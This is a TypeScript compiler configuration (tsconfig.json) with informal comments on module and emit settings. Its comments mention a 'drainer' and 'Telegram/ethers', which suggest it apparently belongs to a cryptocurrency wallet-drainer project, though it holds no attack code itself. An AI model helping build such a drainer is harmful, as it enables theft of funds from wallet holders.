{
"compilerOptions": {
"target": "ES2020",
"useDefineForClassFields": true,
"lib": ["ES2020"],
"outDir": "./dist",
"module": "commonjs",  // Switched: Ditch ESM for Node stability; no more loader crashes
"skipLibCheck": true,
"moduleResolution": "node",
"allowImportingTsExtensions": false,
"resolveJsonModule": true,
"isolatedModules": true,
"noEmit": false,  // Fixed: Set to false so tsc spits out JS to dist/
"strict": true,
"noUnusedLocals": false,  // Keep disabled for now
"noUnusedParameters": true,
"noFallthroughCasesInSwitch": true,
"esModuleInterop": true,  // Added: Smooths commonjs/ESM imports in drainer
"allowSyntheticDefaultImports": true  // Added: For Telegram/ethers bullshit
},
"include": ["src"],
"exclude": ["node_modules", "dist"]  // Added: Skip crap
}
